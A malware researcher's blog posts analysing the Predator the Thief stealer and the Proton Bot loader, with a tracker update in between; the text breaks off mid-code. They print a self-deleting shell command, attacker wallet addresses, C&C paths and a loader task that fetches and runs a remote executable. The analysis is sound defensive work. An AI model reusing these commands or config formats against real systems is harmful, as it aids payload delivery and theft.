Something really interesting about this stealer these days is that it has developed a feature for adding additional tasks as part of a module/plugin package. Maybe this thing is wrongly named (I will probably be corrected soon about this statement), but it's now definitely sure that we can consider this malware a modular one.
When decrypting the config from check.get, you can quickly understand that a module will be launched by looking at the last entry...
[PREDATOR_CONFIG]#[GRABBER]#[NETWORK_INFO]#[LOADER]#[example]
This will be the name of the module that will be requested from the C&C (this is also the easiest way to spot a new module).
- example.get
- example.post
The first request gives you the config of the module (in my case it was like this); it's saved but NOT decrypted (it looks like this part is handled by the module itself). The other request focuses on downloading the payload, decrypting it and saving it to disk in a random folder in %PROGRAMDATA% (the filename is also randomly generated). When that's done, it's simply executed by ShellExecuteA.
Also, another thing to notice: it is designed to launch multiple modules/plugins.
Clipper (Optional module)
The clipper is one example of a module that can be loaded by the module manager. So far, this is the only one I have seen (maybe there are others, maybe not; I don't have the visibility for that).
Disclaimer: To avoid any confusion, the clipper is specific to Predator the Thief and is NOT something coming from another actor (if that were the case, the loader part would be used).

Clipper WinMain function
This malware module is developed in C++ and, like Predator itself, you can recognize pretty well the obfuscation specific to it (stack strings, XOR, SUB, spaghetti code, a recreated GetProcAddress...). Well, everything that you love for slowing down your analysis again.
As already detailed a little above, the module is designed to grab the config from the main program, decrypt it and run the following routine indefinitely:
- Open the clipboard
- Check the content against the loaded config
- If something matches, put in the malicious wallet
- Sleep
- Repeat
The clipper config is rudimentary, using "|" as a delimiter between entries. Within each entry, the mask/regex is on the left of the ":" and the malicious wallet on the right.
1*:1Eh8gHDVCS8xuKQNhCtZKiE1dVuRQiQ58H| 3*:1Eh8gHDVCS8xuKQNhCtZKiE1dVuRQiQ58H| 0x*:0x7996ad65556859C0F795Fe590018b08699092B9C| q*:qztrpt42h78ks7h6jlgtqtvhp3q6utm7sqrsupgwv0| G*:GaJvoTcC4Bw3kitxHWU4nrdDK3izXCTmFQ| X*:XruZmSaEYPX2mH48nGkPSGTzFiPfKXDLWn| L*:LdPvBrWvimse3WuVNg6pjH15GgBUtSUaWy| t*:t1dLgBbvV6sXNCMUSS5JeLjF4XhhbJYSDAe| 4*:44tLjmXrQNrWJ5NBsEj2R77ZBEgDa3fEe9GLpSf2FRmhexPvfYDUAB7EXX1Hdb3aMQ9FLqdJ56yaAhiXoRsceGJCRS3Jxkn| D*:DUMKwVVAaMcbtdWipMkXoGfRistK1cC26C| A*:AaUgfMh5iVkGKLVpMUZW8tGuyjZQNViwDt|
There is no communication with the C&C when the clipper switches a wallet; it works offline.
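For triage, the clipper config shown above can be turned into a lookup table with a small parser. This is a minimal sketch: the function names are mine, only three of the entries are reproduced, and treating the left-hand side as a glob-style mask (via `fnmatchcase`) is an assumption about how the module interprets it.

```python
from fnmatch import fnmatchcase

def parse_clipper_config(raw: str) -> dict:
    """Map each mask (left of ':') to its replacement wallet (right of ':')."""
    rules = {}
    for entry in raw.split("|"):
        entry = entry.strip()
        if not entry:
            continue  # the trailing "|" leaves an empty entry
        mask, _, wallet = entry.partition(":")
        rules[mask] = wallet
    return rules

def matching_wallet(clipboard_text: str, rules: dict):
    """Return the wallet of the first mask that matches, or None (glob semantics assumed)."""
    for mask, wallet in rules.items():
        if fnmatchcase(clipboard_text, mask):
            return wallet
    return None

# Three entries taken from the decrypted config above.
sample = ("1*:1Eh8gHDVCS8xuKQNhCtZKiE1dVuRQiQ58H| "
          "0x*:0x7996ad65556859C0F795Fe590018b08699092B9C| "
          "D*:DUMKwVVAaMcbtdWipMkXoGfRistK1cC26C|")
rules = parse_clipper_config(sample)
```

The resulting wallet values are also convenient to feed into an IoC list.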
Self Removal
When the corresponding parameter is set to 1 in the Predator config obtained from check.get, the malware performs a really simple task to erase itself from the machine once all the tasks are done.
By looking at the bottom of the big main function where all the tasks are performed, you can see two main blocks that could be skipped. These two are huge stack strings that generate two things:
- The API request "ShellExecuteA"
- The command "ping 127.0.0.1 & del %PATH%"
When everything is prepared, the command is simply executed behind the classic register call. By the way, issuing a ping request is one of the dozen ways to emulate a sleep call and wait a little before performing the deletion.
This option is not performed by default when the malware is not able to get data from the C&C.
Telemetry files
There are a bunch of files specific to this stealer, which are generated during the whole infection process. Each of them has a specific meaning.
Information.txt
- Signature of the stealer
- Stealing statistics
- Computer specs
- Number of users in the machine
- List of logical drives
- Current usage resources
- Clipboard content
- Network info
- Compile-time of the payload
Also, this generated file is literally "hell" when you want to dig into it, due to the amount of obfuscated code.
I can also cite the following important telemetry files:
Software.txt
- Windows Build Version
- Generated User-Agent
- List of software installed in the machine (checking for x32 and x64 architecture folders)
Actions.txt
- List of actions & telemetry performed by the stealer itself during the stealing process
Projects.txt
- List of SLN filenames found during the grabber search (the static one)
CookeList.txt
- List of cookies content fetched/parsed
Network
User-Agent "Builder"
Some features are fun to dig into. When I heard that Predator is now generating a dynamic User-Agent, I had a few ideas about how it was done, but in fact, it's way simpler than I thought.
The User-Agent is generated in 5 steps:
- Decrypting a static string that contains the first part of the User-Agent
- Using GetTickCount and grabbing its last bytes to generate a fake build version of Chrome
- Decrypting another static string that contains the end of the User-Agent
- Concatenating everything
- Profit
This User-Agent is shown in the software.txt log file.
C&C Requests
There are currently 4 kinds of requests seen in Predator 3.3.2 (it's always a POST request)
Request | Meaning |
api/check.get | Get dynamic config, tasks and network info |
api/gate.get?... | Send stolen data |
api/.get | Get modular dynamic config |
api/.post | Get modular dynamic payload (was like this with the clipper) |
The first step - Get the config & extra info
For the first request, the response from the server always comes in a specific form:
- A string, obviously base64-encoded
- Encrypted with RC4, using the domain name as the key
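The two layers listed above can be reproduced offline with a few lines of Python. This is a sketch under assumptions: the helper names are mine, and the exact key form (bare C&C domain, without scheme or path) is inferred from the description rather than confirmed byte for byte.

```python
import base64

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling followed by the keystream XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

def decrypt_config(response_body: str, c2_domain: str) -> str:
    """Base64-decode the check.get response, then RC4-decrypt it with the domain."""
    encrypted = base64.b64decode(response_body)
    return rc4(c2_domain.encode(), encrypted).decode("utf-8", errors="replace")
```

Since RC4 is symmetric, the same `rc4` helper can be used to re-encrypt a modified config when emulating a C&C in a lab.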
When decrypted, the config is pretty easy to guess but also a bit complex (due to the number of options & parameters that the threat actor is able to set).
[0;1;0;1;1;0;1;1;0;512;]#[[%userprofile%\Desktop|%userprofile%\Downloads|%userprofile%\Documents;*.xls,*.xlsx,*.doc,*.txt;128;;0]]#[Trakai;Republic of Lithuania;54.6378;24.9343;85.206.166.82;Europe/Vilnius;21001]#[]#[Clipper]
It's easy to see that the config is split by "#", and each part can be summarized like this:
- The stealer config
- The grabber config
- The network config
- The loader config
- The dynamic modular config (e.g. Clipper)
I have represented each of them as a table with the meaning of each of the parameters (when it was possible).
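As a quick illustration, the five "#"-separated parts can be split into named sections. The section names and the function name are my own labels, and the sketch assumes no section ever contains a literal "#".

```python
SECTION_NAMES = ("stealer", "grabber", "network", "loader", "modules")

def split_config(decrypted: str) -> dict:
    """Split a decrypted check.get config into its five bracketed sections."""
    parts = decrypted.split("#")
    if len(parts) != len(SECTION_NAMES):
        raise ValueError(f"expected {len(SECTION_NAMES)} sections, got {len(parts)}")
    sections = {}
    for name, part in zip(SECTION_NAMES, parts):
        # Remove exactly one pair of outer brackets, keeping any nested ones.
        if part.startswith("[") and part.endswith("]"):
            part = part[1:-1]
        sections[name] = part
    return sections

# The decrypted config shown above.
raw = (r"[0;1;0;1;1;0;1;1;0;512;]#[[%userprofile%\Desktop|%userprofile%\Downloads|"
       r"%userprofile%\Documents;*.xls,*.xlsx,*.doc,*.txt;128;;0]]#"
       r"[Trakai;Republic of Lithuania;54.6378;24.9343;85.206.166.82;Europe/Vilnius;21001]"
       r"#[]#[Clipper]")
sections = split_config(raw)
```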
Predator config
Args | Meaning |
Field 1 | Webcam screenshot |
Field 2 | Anti VM |
Field 3 | Skype |
Field 4 | Steam |
Field 5 | Desktop screenshot |
Field 6 | Anti-CIS |
Field 7 | Self Destroy |
Field 8 | Telegram |
Field 9 | Windows Cookie |
Field 10 | Max size for files grabbed |
Field 11 | Powershell script (in base64) |
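The table above maps directly onto the first section of the config. A minimal sketch, where the key names are my own shorthand for the table entries:

```python
STEALER_FIELDS = (
    "webcam_screenshot", "anti_vm", "skype", "steam", "desktop_screenshot",
    "anti_cis", "self_destroy", "telegram", "windows_cookie",
    "max_grab_size", "powershell_b64",
)

def decode_stealer_config(section: str) -> dict:
    """Pair each ';'-separated value with the field name from the table."""
    values = section.split(";")
    return dict(zip(STEALER_FIELDS, values))

# Stealer section of the config shown earlier (outer brackets removed).
flags = decode_stealer_config("0;1;0;1;1;0;1;1;0;512;")
```

With this sample, the anti-VM check and the self-destroy option are enabled, and no PowerShell script is provided.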
Grabber config
[]#[GRABBER]#[]#[]#[]
Args | Meaning |
Field 1 | %PATH% using "|" as a delimiter |
Field 2 | Files to grab |
Field 3 | Max size for each file grabbed |
Field 4 | Whitelist |
Field 5 | Recursive search (0 = off, 1 = on) |
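A grabber rule can be decoded along the same lines. This sketch handles a single rule only; the "," separator between masks is taken from the sample config, and how several rules are chained is not covered here.

```python
def parse_grabber_rule(rule: str) -> dict:
    """Decode one grabber rule into the five fields of the table."""
    fields = rule.strip("[]").split(";")
    paths, masks, max_size, whitelist, recursive = fields
    return {
        "paths": paths.split("|"),
        "masks": masks.split(","),
        "max_size": int(max_size),
        "whitelist": whitelist,
        "recursive": recursive == "1",
    }

# Grabber rule from the config shown earlier.
rule = parse_grabber_rule(
    r"[%userprofile%\Desktop|%userprofile%\Downloads|%userprofile%\Documents;"
    r"*.xls,*.xlsx,*.doc,*.txt;128;;0]"
)
```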
Network info
[]#[]#[NETWORK]#[]#[]
Args | Meaning |
Field 1 | City |
Field 2 | Country |
Field 3 | GPS Coordinate |
Field 4 | Time Zone |
Field 5 | Postal Code |
Loader config
[]#[]#[]#[LOADER]#[]
Format
[[URL;3;2;;;;1;amazon.com;0;0;1;0;0;5]]
Meaning
- Loader URL
- Loader Type
- Architecture
- Targeted Countries ("," as a delimiter)
- Blacklisted Countries ("," as a delimiter)
- Arguments on startup
- Injected process OR where it's saved and executed
- Pushing loader if the specific domain(s) is (are) seen in the stolen data
- Pushing loader if wallets are present
- Persistence
- Executing in admin mode
- Random file generated
- Repeating execution
- ???
Loader type (argument 2)
Value | Meaning |
1 | RunPE |
2 | CreateProcess |
3 | ShellExecute |
4 | LoadPE |
5 | LoadLibrary |
Architecture (argument 3)
Value | Meaning |
1 | x32 / x64 |
2 | x32 only |
3 | x64 only |
If it's RunPE (argument 7)
Value | Meaning |
1 | Attrib.exe |
2 | Cmd.exe |
3 | Audiodg.exe |
If it's CreateProcess / ShellExecuteA / LoadLibrary (argument 7)
Value | Meaning |
1 | %PROGRAMDATA% |
2 | %TEMP% |
3 | %APPDATA% |
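Putting the lookup tables above together, a loader rule can be summarized as follows. The function name is mine, the "," delimiter for the domain list is an assumption, and the meaning of argument 7 for LoadPE is not covered by the tables, so it is reported as undocumented.

```python
LOADER_TYPES = {1: "RunPE", 2: "CreateProcess", 3: "ShellExecute", 4: "LoadPE", 5: "LoadLibrary"}
ARCHITECTURES = {1: "x32 / x64", 2: "x32 only", 3: "x64 only"}
RUNPE_HOSTS = {1: "Attrib.exe", 2: "Cmd.exe", 3: "Audiodg.exe"}
DROP_FOLDERS = {1: "%PROGRAMDATA%", 2: "%TEMP%", 3: "%APPDATA%"}

def describe_loader(rule: str) -> dict:
    """Translate the numeric fields of one loader rule into readable values."""
    fields = rule.strip("[]").split(";")
    loader_type = LOADER_TYPES.get(int(fields[1]), "unknown")
    arg7 = int(fields[6]) if fields[6] else None
    if loader_type == "RunPE":
        location = RUNPE_HOSTS.get(arg7, "unknown")
    elif loader_type in ("CreateProcess", "ShellExecute", "LoadLibrary"):
        location = DROP_FOLDERS.get(arg7, "unknown")
    else:
        location = "not documented"
    return {
        "url": fields[0],
        "type": loader_type,
        "architecture": ARCHITECTURES.get(int(fields[2]), "unknown"),
        "location": location,
        # "," as the domain separator is an assumption
        "trigger_domains": [d for d in fields[7].split(",") if d],
    }

info = describe_loader("[[URL;3;2;;;;1;amazon.com;0;0;1;0;0;5]]")
```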
The second step - Sending stolen data
Format
/api/gate.get?p1=X&p2=X&p3=X&p4=X&p5=X&p6=X&p7=X&p8=X&p9=X&p10=X
Goal
- Sending stolen data
- Also victim telemetry
Meaning
Args | Field |
p1 | Passwords |
p2 | Cookies |
p3 | Credit Cards |
p4 | Forms |
p5 | Steam |
p6 | Wallets |
p7 | Telegram |
p8 | ??? |
p9 | ??? |
p10 | OS Version (encrypted + encoded)* |
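When reviewing proxy or PCAP logs, the query string of a gate.get request can be mapped back to the table above. A small sketch: the key names are my own shorthand, the values in the sample URL are made up for illustration, and p8/p9 are kept under their raw names since their meaning is unknown.

```python
from urllib.parse import parse_qs, urlsplit

GATE_FIELDS = {
    "p1": "passwords", "p2": "cookies", "p3": "credit_cards", "p4": "forms",
    "p5": "steam", "p6": "wallets", "p7": "telegram", "p10": "os_version",
}

def parse_gate_request(url: str) -> dict:
    """Return the gate.get parameters keyed by their meaning when it is known."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {GATE_FIELDS.get(key, key): values[0] for key, values in query.items()}

# Hypothetical values, only the parameter layout comes from the analysis.
stats = parse_gate_request(
    "/api/gate.get?p1=12&p2=340&p3=0&p4=5&p5=1&p6=0&p7=1&p8=0&p9=0&p10=QUJD"
)
```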
This is an example of a crafted request performed by Predator the Thief
Third step - Modular tasks (optional)
/api/Clipper.get
Gives the dynamic clipper config
/api/Clipper.post
Gives the Predator clipper payload
Server side
The C&C is nowadays way different than at the beginning; it has been reworked with a fancy design and is able to do some stuff:
- Modular C&C
- Classic fancy index with statistics
- Possibility to configure your panel itself
- Dynamic grabber configuration
- Telegram notifications
- Backups
- Tags for specific domains
Index
The Predator panel changed a lot between v2 and v3. It now has a fancy theme, and you can easily spot the whole statistics at first glance. The thing to notice is that the panel is fully in Russian (and I don't know at this time if there is an English one).
The menu on the left is divided like this (but I'm not really sure about the correct translation):
Меню (Menu)
Статистика (Stats)
- Логов (Logs)
- По странам (Country stats)
- Лоадера (Loader Stats)
Логи (Logs)
- Обычная (Regular)
Модули (Modules)
- Загрузить модуль (Download/Upload Module)
Настройки (Settings)
- Настройки сайта (Site settings)
- Телеграм бот (Telegram Bot)
- Конфиг (Config)
Граббер (Grabber)
Лоадер (Loader)
Domain Detect
Backup
Поиск (Search)
Конвертация (Converter => Netscape Json converter)
Statistics / Landscape
Predator Config
In terms of configuring Predator, the choices are pretty wild:
- The actor is able to tweak its panel by modifying some details, like the title, and a detail that made me laugh is that you can choose a dark theme.
- There is also another form: the payload config is set up by just ticking options. When done, this will update what is returned by the check.get request
- As usual, there is also a Telegram bot feature
Creating Tags for domains seen
A small detail that was also mentioned for Vidar: if the actor wants to pay specific attention to bots that have data coming from specific domains, he can create a tag that will help him easily filter which of them are probably worth digging into.
Loader config
The loader configuration is by far the most interesting part from my point of view and, even though its functionality has already been fully explained, I consider it pretty complete and user-friendly for the threat actor using it.
IoCs
Hashes for this analysis
p_pckd.exe - 21ebdc3a58f3d346247b2893d41c80126edabb060759af846273f9c9d0c92a9a
p_upkd.exe - 6e27a2b223ef076d952aaa7c69725c831997898bebcd2d99654f4a1aa3358619
p_clipper.exe - 01ef26b464faf08081fceeeb2cdff7a66ffdbd31072fe47b4eb43c219da287e8
C&C
- cadvexmail19mn.world
Other predator hashes
- 9110e59b6c7ced21e194d37bb4fc14b2
- 51e1924ac4c3f87553e9e9c712348ac8
- fe6125adb3cc69aa8c97ab31a0e7f5f8
- 02484e00e248da80c897e2261e65d275
- a86f18fa2d67415ac2d576e1cd5ccad8
- 3861a092245655330f0f1ffec75aca67
- ed3893c96decc3aa798be93192413d28
Conclusion
Infostealers are not considered as harmful as the recent, highly publicized ransomware attacks, but they are effective enough to cause severe damage and should not be underrated. Furthermore, with cryptocurrencies becoming more and more common, or even something totally normal nowadays, the lack of security hygiene on this subject is awfully insane, so I am not surprised at all to see so much money stolen. These stealers will remain really active, and it's always interesting to keep an eye on this malware family (and also on clippers): whenever a new wallet or cryptocurrency trading software appears on the list, you easily know what the possible trends are (if you lack knowledge in that area).
Nowadays, it's easy to see fresh activity in the wild for this info stealer; it can be dropped by major malware campaigns where notorious malware like ISFB Gozi is also used. It's unnecessary (on my side) to speculate about what the next move with Predator will be; I clearly have no idea and am not interested in that kind of stuff. The thing is, the malware scene nowadays is evolving really fast: threat actor teams move/switch easily, and it can take only hours for new updates and reworks of malware, just by modifying a piece of code with something already developed in some GitHub repository or by copying code from another malware. Also, the price of the malware may have been adjusted, or the support communication moved to something else.
Due to this, I am pretty sure that this in-depth analysis could already be outdated by some modifications by the time you read it. It's always a risk to take and, on my side, I am only interested in the malware itself; the main ideas/facts of the major version are explained, and that's plenty sufficient. There are, of course, some topics that I haven't talked about, like the fact that Predator is now able to work as a classic executable file or as a DLL, but this was developed some time ago and the subject is now a bit popular. Another point for which I didn't find any explanation is the presence of some string decryption routines that lead to some encryption algorithm related to Tor.
This in-depth analysis is also focused on showing that even simple tricks are an efficient way to slow down analysis, and it is a good exercise to practice your skills if you want to improve in malware analysis. Also, reverse engineering is not as hard as people might think once the fundamental concepts are assimilated. It's just time, practice and motivation.
On my side, I am, as usual, irregular in releasing stuff due to some stuff (again...). By the way, updating projects is still one of my main focuses; I still have some things that I would love to finish which are not necessarily related to malware analysis. It's cool to change topics sometimes.
#HappyHunting
Haruko Malware Tracker - 1 Year Anniversary Update
Hi folks,
It's been one year since the tracker (https://tracker.fumik0.com) went active and, over these past months, I have understood that maintaining this solo project is definitely not an easy task. But right now, Haruko is, step by step, a growing place that provides a starting point for OSINT, for learning malware reverse engineering, or for helping blue team people when they have to analyze some samples.
If I could summarize this malware tracker in one year:
- 2600+ Samples
- A learning tab with dozens of exercises added
- A malware tab with 40+ notes for quick tips with some malware implemented
- An Unlimited API
... and all of this is free.
It's pretty obvious that some companies are grabbing data from my project to resell it afterwards without any credit, or changing the name of the sample by adding tags for other commercial bullshit nonsense to prove they were the first on it. That's all part of the game, that's life.
At first, this tracker was created because a lot of people can't even afford tools or services just to be able to search, download and analyze samples and improve their skills. Among other free services, this is a good start for your OSINT and for learning some stuff. If this tracker is helping students, teachers providing courses, junior analysts or just the curious, that's the most important thing.
New section โ Wallet
For some years now, cryptocurrencies have been part of the cybercrime landscape, with more and more trends around them. So, to get an idea of which of them are used/abused by threat actors, it could be a good thing to centralize them.
API
/api/get-wallets
/api/wallet/value
Why the idea of this branch?
- Plug the API into the step of the transaction, for a better security approach
- If a wallet is switched by a clipper, the API request is a way to check if, in the DB, this one is already known for some malicious activities and could be blocked easily.
New field โ Domain
For OSINT research, the field "domain" has been added
domain
On the website
Example in JSON format
{
   "first_seen":"2018-08-05",
   "first_seen_details":"1533469173",
   "hash":{
      "md5":"ca92b2a06320fa138989ead470e6b8f5",
      "sha1":"feb71e950f43eac5037def7513f7c4e5eb3d76cc",
      "sha256":"af2c63561aa10a1e444471706a5ea35f951795dff4bb1fc735fdf05c8f30b998"
   },
   "hash_seen":1,
   "id":"5b66e1f5143e9a34ec8a3752",
   "sample":{
      "name":"jardata.exe",
      "size":"1102336"
   },
   "server":{
      "AS":"AS16509",
      "country":"us",
      "domain":"bitbucket.org",
      "ip":"52.216.84.40",
      "url":"bitbucket.org/kent9876/test/downloads/jardata.exe"
   }
}
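As a usage example, a record in this format can be reduced to the handful of indicators that are typically pushed into a blocklist or a SIEM. This is only a sketch: the function name and the selection of fields are my own choice, and the record is a trimmed copy of the JSON example above.

```python
import json

def extract_iocs(record: dict) -> dict:
    """Keep only the network and file indicators of one tracker record."""
    return {
        "sha256": record["hash"]["sha256"],
        "domain": record["server"]["domain"],
        "ip": record["server"]["ip"],
        "url": record["server"]["url"],
    }

# Trimmed copy of the example record (hash and server parts only).
record = json.loads("""
{
  "hash": {
    "sha256": "af2c63561aa10a1e444471706a5ea35f951795dff4bb1fc735fdf05c8f30b998"
  },
  "server": {
    "domain": "bitbucket.org",
    "ip": "52.216.84.40",
    "url": "bitbucket.org/kent9876/test/downloads/jardata.exe"
  }
}
""")
iocs = extract_iocs(record)
```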
Updates on API
I have made some small tweaks to the API; some new endpoints are now available:
/api/ip/value
/api/domain/value
/api/as/value
/api/country/value
/api/md5/value
/api/sha256/value
What next?
I have some other things that I want to release before the end of this year (unrelated to this tracker). I'm not sure I will have enough time to complete everything, but yes, other content & ideas are coming.
If you want to participate in this project, contact me.
Fumi o/
Overview of Proton Bot, another loader in the wild!
Loaders nowadays are part of the malware landscape, and it is common to see sandbox log results tagged with "loader". Specialized loader malware like Smoke or Hancitor/Chanitor are increasingly facing new alternatives like Godzilla loader, as well as stealers, miners and plenty of other kinds of malware that ship this feature as an option. This is easy to spot and was already explained in earlier articles that I have written.
For a few months now, another dedicated loader malware has been appearing from multiple sources under the name "Proton Bot"; on my side, the first results came from a v0.30 version. For this article, the overview will focus on the latest one, the v1.
Sold for 50$ (with the C&C panel) and developed in C++, it's cheaper than Smoke (usually seen at an average of 200$/300$), which could explain why some actors/customers are making changes and trying new products to see if it's worth continuing with them. The developer behind it (glad0ff) is not on his first malware; he is also behind Acrux & Decrux.
[Disclaimer: This article is not an in-depth analysis]
Analyzed sample
- 1AF50F81E46C8E8D49C44CB2765DD71A [Packed]
- 4C422E9D3331BD3F1BB785A1A4035BBD [Unpacked]
Something that I am finally glad about when reversing this malware is that I'm not in pain unpacking a VM-protected sample. So far, this is the "only one" that I've analyzed from this developer that is not using Themida, VMProtect or Enigma Protector.
So finally seeing a clean PE is some kind of heaven.
Behavior
When the malware is launched, it retrieves the full path of the executed module by calling GetModuleFileName. This returned value is the key for Proton Bot to verify whether this is a first-time interaction on the victim machine or, on the contrary, an already set up and configured bot. The path is compared with a corresponding name & directory hardcoded in the code, which are obviously obfuscated and encrypted.
This call is an alternative to GetCommandLine in this case.
On the screenshot above, EDI contains the path of the payload currently executed, and EAX the final location. At this point, lacking samples, I cannot confirm whether this path is unique for all Proton Bot v1 builds or whether multiple values are possible; this will be resolved when more samples are available for analysis...
Next, no matter the scenario, the loader forces persistence with a scheduled task trick. Multiple obfuscated blocks follow a scheme to generate the request until it is finally built and executed with a simple ShellExecuteA call.
With persistence finally set up, the comparison between the values that I showed in the registers now diverges in two directions:
If paths are different
- Making an HTTP request to "http://iplogger.org/1i237a" to grab the bot IP
- Creating a folder & copying the payload in an unusual way that I will explain later.
- Executing Proton Bot again from the correct folder with CreateProcessA
- Exiting the current module
If paths are identical
- two threads are created for specific purposes
- one for the loader
- the other for the clipper
- At that point, all interactions between the bot and the C&C will always be starting with this format :
/page.php?id=%GUID%
%GUID% is, in fact, the Machine GUID, so in a real scenario, this could be, for example, the value "fdff340f-c526-4b55-b1d1-60732104b942".
Summary
- Mutex
dsks102d8h911s29
- Loader Path
%APPDATA%/NvidiaAdapter
- Loader Folder
- Schedule Task
- Process
A unique way to perform data interaction
This loader has an odd and unorthodox way of handling data access and storage, using the Windows KTM library. This is quite different from most malware, which usually uses easier ways to perform tasks like creating a folder or a file with the help of the FileAPI module.
The idea here is to perform actions on data with the guarantee that there is not a single error during the operation. For this level of reliability and integrity, the Kernel Transaction Manager (KTM) comes into play with the help of Transactional NTFS (TxF).
For those who aren't familiar with this, here is an example:
- CreateTransaction is called for starting the transaction process
- The requested task is now called
- If everything is good, the Transaction is finalized with a commit (CommitTransaction) and confirming the operation is a success
- If a single thing failed (even 1 among 10000 tasks), the transaction is rolled back with RollbackTransaction
In the end, this is the task list used by ProtonBot:
This different way of interacting with the operating system is a nice way to escape some API monitoring or to avoid triggers from sandboxes & specialized software. It's now a matter of time before this behavior is hotfixed and adjusted for better results.
The same API has also been used for another technique, covered in the analysis of the banking malware Osiris by @hasherezade
Anti-Analysis
There are three main things exploited here:
- Stack String
- Xor encryption
- Xor key adjusted with a NOT operand
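To give an idea of what the last two points mean in practice, here is a minimal sketch of a single-byte XOR decoder whose key is first inverted with a bitwise NOT. The exact key derivation used by the sample is not documented here, so both the function name and the one-byte key layout are assumptions for illustration only.

```python
def xor_not_decode(data: bytes, key: int) -> bytes:
    """XOR every byte with the bitwise NOT of a one-byte key (assumed layout)."""
    adjusted_key = ~key & 0xFF  # NOT applied to the key, kept within one byte
    return bytes(byte ^ adjusted_key for byte in data)

# XOR is its own inverse, so the same routine encodes and decodes.
encoded = xor_not_decode(b"ktmw32.dll", 0x5A)
decoded = xor_not_decode(encoded, 0x5A)
```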
My guess is that, with the use of stack strings, the main idea is just to add some obfuscation to the code, generating a huge amount of blocks during disassembly/debugging to slow down the analysis. This is somewhat the same kind of behavior that Predator the Thief has been abusing since its v3 version.
The screenshot above is one example among others in this malware of the techniques presented, and there is nothing new to explain in depth here; these have been mentioned multiple times. I would say with humor that C++ itself is some kind of anti-analysis, which is enough to make you take some aspirin.
Loader Architecture
The loader is divided into 5 main sections:
- Performing a C&C request to add the bot or ask for a task.
- Receiving results from the C&C
- Analyzing the OpCode and executing the corresponding task
- Sending a request to the C&C to indicate that the task has been accomplished
- Repeat the process [GOTO 1]
C&C requests
Former loader request
Path base
/page.php
Required arguments
Argument | Meaning | API Call / Miscellaneous |
---|---|---|
id | Bot ID | RegQueryValueExA - MachineGUID |
os | Operating System | RegQueryValueExA - ProductName |
pv | Account Privilege | Hardcoded string - "Admin" |
a | Antivirus | Hardcoded string - "Not Supported" |
cp | CPU | Cpuid (Very similar code) |
gp | GPU | EnumDisplayDevicesA |
ip | IP | GetModuleFileName (Yup, it's weird) |
name | Username | RegQueryValueExA - RegisteredOwner |
ver | Loader version | Hardcoded string - "1.0 Release" |
lr | ??? | Hardcoded string - "Coming Soon" |
Additional fields when a task is completed
Argument | Meaning | API Call / Miscellaneous |
---|---|---|
op | OpCode | Integer |
td | Task ID | Integer |
Task format
The task format is really simple and is presented as a simple structure like this.
Task Name;Task ID;Opcode;Value
Tasks OpCodes
When receiving the task, the OpCode is an integer value that selects the specified task. At this time, I have counted 12 possible features behind the OpCode; some of them are almost identical, with just a small tweak to differentiate them.
OpCode | Feature |
---|---|
1 | Loader |
2 | Self-Destruct |
3 | Self-Renewal |
4 | Execute Batch script |
5 | Execute VB script |
6 | Execute HTML code |
7 | Execute Powershell script |
8 | Download & Save new wallpaper |
9 | ??? |
10 | ??? |
11 | ??? |
12 (Supposed) | DDoS |
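For log triage, the task format and the OpCode table can be combined into a small parser. This is a sketch with names of my own choosing; OpCodes 9 to 11 are left out because their meaning is unknown, and the sample string is a task observed on the C&C of the analyzed sample.

```python
from typing import NamedTuple

OPCODES = {
    1: "Loader", 2: "Self-Destruct", 3: "Self-Renewal",
    4: "Execute Batch script", 5: "Execute VB script", 6: "Execute HTML code",
    7: "Execute Powershell script", 8: "Download & Save new wallpaper",
    12: "DDoS (supposed)",
}

class Task(NamedTuple):
    name: str
    task_id: int
    opcode: int
    value: str

def parse_task(raw: str) -> Task:
    """Parse 'Task Name;Task ID;Opcode;Value' (the value may itself contain ';')."""
    name, task_id, opcode, value = raw.split(";", 3)
    return Task(name, int(task_id), int(opcode), value)

task = parse_task("newtask;112;1;http://187.ip-54-36-162.eu/uploads/me0zam1czo.exe")
feature = OPCODES.get(task.opcode, "unknown")
```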
For those who want to see what the loader part looks like in a disassembler, it's quite pleasant (sarcasm)
the joy of C++
Loader main task
The loader task is set to OpCode 1. In a real scenario, it could look like this:
newtask;112;1;http://187.ip-54-36-162.eu/uploads/me0zam1czo.exe
This is simple but accurate enough to do the task:
- Set up the download directory in %TEMP% with GetTempPathA
- Remove footprints from the cache - DeleteUrlCacheEntryA
- Download the payload - URLDownloadToFileA
- Set attributes on the file by using transactions
- Execute the payload - ShellExecuteA
Other features
Clipper
Clipper fundamentals are always the same and, at this point, I'm mostly interested in how the developer decided to organize this task. In this case, it is simple but enough to do the job accurately.
The first main thing to report is that the wallets and the respective regular expressions for detecting them are not hardcoded in the source code; the bot needs to perform an HTTP request to the C&C only once to set this up:
/page.php?id=%GUID%&clip=get
The response is a consolidated list of a homemade structure that contains the configuration decided by the attacker. The format is represented like this:
[
    id,             # ID on C&C
    name,           # ID Name (i.e: Bitcoin)
    regex,          # Regular Expression for catching the Wallet
    attackerWallet  # Switching victim wallet with this one
]
At first, I thought there was a request to the C&C whenever the clipper matched a regular expression, but that's not the case here.
In this case, the attacker has decided to target the following wallets:
- Bitcoin
- Dash
- Litecoin
- Zcash
- Ethereum
- DogeCoin
If you want an in-depth analysis of a clipper task, I recommend checking my other articles that cover this in detail (Megumin & Qulab).
DDos
Proton implements a layer 4 DDoS attack, flooding the target server with TCP socket requests on a specified port using WinSock.
Executing scripts
The loader is also configured to launch scripts; this technique is usually spotted and shared by researchers on Twitter, with a bunch of raw Pastebin links downloaded and adjusted to be able to work.
- Deobfuscating the selected format (.bat in this case)
- Downloading the script to %TEMP%
- Changing the type of the downloaded script
- Executing the script with ShellExecuteA
Available formats are .bat, .vbs, .ps1, .html
Wallpaper
It is possible to change the wallpaper of the bot by sending OpCode 8 along with an image to download. The scenario remains the same as the loader main task, with the exception of a different API call at the end:
- Set up the download directory in %TEMP% with GetTempPathA
- Remove footprints from the cache - DeleteUrlCacheEntryA
- Download the image - URLDownloadToFileA
- Change the wallpaper with SystemParametersInfoA
In this case, the call will look like this:
BOOL SystemParametersInfoA (
    UINT  uiAction -> 0x0014 (SPI_SETDESKWALLPAPER)
    UINT  uiParam  -> 0
